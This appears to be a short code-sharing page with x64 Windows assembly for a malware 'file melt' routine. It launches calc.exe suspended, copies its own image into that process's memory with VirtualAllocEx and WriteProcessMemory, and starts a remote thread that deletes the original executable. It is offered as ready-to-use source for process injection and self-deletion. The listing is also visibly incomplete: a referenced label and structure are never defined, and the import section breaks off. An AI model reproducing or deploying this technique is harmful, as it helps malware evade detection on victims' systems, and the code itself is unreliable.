(MASM) File Melt by Jochen

Feb. 26, 2021, midnight | 1 year, 4 months


            include 'win64ax.inc'
include 'pe.inc'
entry start


       sub rsp, 8 ; Align stack

       fastcall [GetModuleFileNameA], 0, modulename, 50 ; Get full path of this file

       mov rax,[gs:60h]    ; PEB
       mov rax,[rax+10h]   ; ImageBaseAddress

       mov [ImageBaseAddress], rax

       movsxd  rax, dword [rax+IMAGE_DOS_HEADER.e_lfanew]
       add rax,[ImageBaseAddress]

       mov eax, dword [rax+IMAGE_NT_HEADERS64.OptionalHeader.SizeOfImage]
       mov [dwSize], eax

       ; To work for Win10 we must clear the sinfo struct (104 Bytes)

       cinvoke memset, sinfo, 0, 104d
       mov  [sinfo.cb], 104d

       ; Now we create the process to inject our code in with CREATE_SUSPENDED flag so it does not actually run :)

       fastcall [CreateProcessA], 0, sCalc, 0, 0, FALSE, CREATE_SUSPENDED, 0, 0, sinfo, pinfo

       ; Allocate memory in the remote process (Calc.exe)

       fastcall [VirtualAllocEx], [pinfo.hProcess], [ImageBaseAddress], [dwSize], MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE

       ; Write it to the remote process

       fastcall [WriteProcessMemory], [pinfo.hProcess], rax, [ImageBaseAddress], [dwSize], 0

       ; execute the code pointed by HijackedThread into the remote process

       fastcall [CreateRemoteThread], [pinfo.hProcess], 0, 0, HijackedThread, 0, 0, 0

exit:  fastcall [ExitProcess], 0  ; exit this process so the injected code can delete this file !


       sub rsp, 8

       invoke DeleteFileA, modulename  ; <-- modulename contains the full path of this file
       invoke ExitProcess,0

section '.data' data readable writeable

sCalc  db  'calc.exe',0  ; <-- process where we inject our code in

 modulename  rb 50

 sinfo	      STARTUPINFO

 ImageBaseAddress     dq 0
 dwSize 	      dd 0

section '.idata' import data readable writeable

  library kernel32,'KERNEL32.DLL',\

 import msvcrt,\

  include 'api\kernel32.inc'
  include 'api\user32.inc'